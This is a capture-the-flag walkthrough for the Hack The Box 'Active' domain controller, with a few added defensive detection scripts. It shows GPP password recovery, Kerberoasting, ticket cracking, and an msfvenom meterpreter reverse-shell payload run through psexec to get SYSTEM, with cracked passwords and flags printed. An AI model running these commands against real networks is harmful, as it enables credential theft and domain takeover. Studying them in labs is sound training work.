About

Active is an easy-to-medium difficulty machine that features two very prevalent techniques for gaining privileges within an Active Directory environment.

Enumeration

Running the script portscan.sh reveals five attack surfaces: DNS, Kerberos, RPC, SMB and LDAP.

┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ sudo portscan.sh 10.129.131.133

┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ cat PortScan\(10.129.131.133\)

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-20 05:54:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49172/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-10-20T05:55:23
|_  start_date: 2023-10-20T05:43:04
|_clock-skew: -10s

PORT      STATE SERVICE VERSION
53/udp    open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
60777/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
61697/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
62135/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
62137/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
62233/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
62266/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
63211/udp open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1

Exploitation

SMB

smbmap reveals a share named Replication that we're allowed to read.

┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ smbmap -H 10.129.131.133
[+] IP: 10.129.131.133:445	Name: 10.129.131.133
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share
	Replication                                       	READ ONLY
	SYSVOL                                            	NO ACCESS	Logon server share
	Users                                             	NO ACCESS

Using Get-GPPPassword.py, I'm able to find the credential SVC_TGS:GPPstillStandingStrong2k18 stored in a Group Policy Preferences file (Groups.xml) on the Replication share.

┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ Get-GPPPassword.py 10.129.131.133 -share Replication
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Listing shares...
  - ADMIN$
  - C$
  - IPC$
  - NETLOGON
  - Replication
  - SYSVOL
  - Users

[*] Searching *.xml files...
[*] NewName	:
[*] Changed	: 2018-07-18 20:46:06
[*] Username	: active.htb\SVC_TGS
[*] Password	: GPPstillStandingStrong2k18
[*] File	: \\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
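A defender's counterpart to the step above, added here and not part of the original writeup: a Python audit that walks a local copy of SYSVOL (or the Replication share) and reports every Group Policy Preferences item still carrying a cpassword attribute, without decrypting anything. The Groups.xml sample, its placeholder cpassword and the temp-directory layout are constructed for the demo; the policy GUID in the path is the one from the output above.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference item types that may carry a cpassword attribute.
PREF_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
              "DataSources.xml", "Printers.xml", "Drives.xml"}
# Constructed sample modelled on the file found above; the cpassword is a placeholder.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS" changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="PLACEHOLDER_NOT_A_REAL_VALUE"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""


def find_cpasswords(sysvol_root):
    """Return (path, userName, changed) for every Preferences item with a cpassword."""
    hits = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in PREF_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # skip malformed XML instead of aborting the audit
            for item in tree.getroot().iter():
                props = item.find("Properties")
                if props is not None and props.get("cpassword"):
                    hits.append((path, props.get("userName", "<none>"),
                                 item.get("changed", "?")))
    return hits


def build_demo_sysvol(include_cpassword=True):
    """Write the sample Groups.xml into a temp dir laid out like the share."""
    root = tempfile.mkdtemp(prefix="sysvol_demo_")
    gpo = os.path.join(root, "active.htb", "Policies",
                       "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                       "MACHINE", "Preferences", "Groups")
    os.makedirs(gpo)
    xml_text = SAMPLE_GROUPS_XML
    if not include_cpassword:  # a remediated file keeps the entry, drops the secret
        xml_text = xml_text.replace('cpassword="PLACEHOLDER_NOT_A_REAL_VALUE"', "")
    with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(xml_text)
    return root
```

Any hit is a finding: the cpassword value is reversible by design, so the fix is to remove the preference item and rotate that account's password.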

Kerberos

Using GetUserSPNs.py with the credentials found, I'm able to request a TGS ticket for the Administrator account, which has the SPN active/CIFS:445 registered.

┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.131.133 -request -outputfile Administrator.john
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-10-20 01:44:10.554546

By cracking the TGS ticket with john, I’m able to find the password Ticketmaster1968 for the user Administrator.

┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ john Administrator.john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
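On the detection side, the hash john loads above is an RC4-HMAC service ticket (etype 23, 0x17 in the Security log). The following is an added example, not from the writeup, that flags 4769 events where a user account's SPN was issued with RC4, which is what a Kerberoast request looks like from the domain controller. The events are constructed and flattened to key=value form; the field names follow the 4769 EventData schema.

```python
import re
from collections import defaultdict

# Constructed Security-log excerpts (not real events from the box), flattened
# to key=value; field names follow the 4769 EventData fields.
SAMPLE_EVENTS = """\
EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=::ffff:10.10.16.9 Status=0x0
EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=::ffff:10.10.16.9 Status=0x0
EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.129.131.133 Status=0x0
EventID=4768 TargetUserName=SVC_TGS ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.10.16.9 Status=0x0
"""

RC4_HMAC = "0x17"  # etype 23, the ticket type john cracked above


def parse_event(line):
    """Split one flattened event line into a field dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_kerberoast_candidate(ev):
    """True for a successful TGS request for a user-account SPN issued with RC4."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False  # machine accounts and the KDC itself are expected noise
    return ev.get("TicketEncryptionType") == RC4_HMAC


def find_kerberoasting(log_text):
    """Return {requesting account: [service accounts]} for flagged requests."""
    flagged = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_event(line)
        if is_kerberoast_candidate(ev):
            flagged[ev["TargetUserName"]].append(ev["ServiceName"])
    return dict(flagged)
```

The lasting fix is the one the request exposes: a privileged account should not carry an SPN, and accounts that must have one need a long random password and AES-only ticket encryption.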

With the Administrator password in hand, I'll create an EXE reverse shell payload using msfvenom.

┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f exe -o exploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: exploit.exe

Finally, by running psexec.py with the retrieved password and the payload, I’m able to gain a shell as the user NT AUTHORITY\SYSTEM.

┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ psexec.py Administrator:Ticketmaster1968@10.129.131.133 -file exploit.exe
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.129.131.133.....
[*] Found writable share ADMIN$
[*] Uploading file yHslfuXU.exe
[*] Opening SVCManager on 10.129.131.133.....
[*] Creating service ODhK on 10.129.131.133.....
[*] Starting service ODhK.....
┌──(m0nk3y@kali)-[~/HTB/Active]
└─$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.16.9; set LPORT 4444; set AutoRunScript post/windows/manage/migrate; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.16.9
LPORT => 4444
AutoRunScript => post/windows/manage/migrate
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175686 bytes) to 10.129.131.133
[*] Session ID 1 (10.10.16.9:4444 -> 10.129.131.133:52988) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DC
[*] Current server process: yHslfuXU.exe (2484)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 2992
[+] Successfully migrated into process 2992
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.131.133:52988) at 2023-10-20 02:55:56 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

meterpreter > cat 'C:\Users\SVC_TGS\Desktop\user.txt'
0d3dd4ed0bad2908290d69403b07f45d

meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
2dd099334cf327e3bbfe691a430fe5b2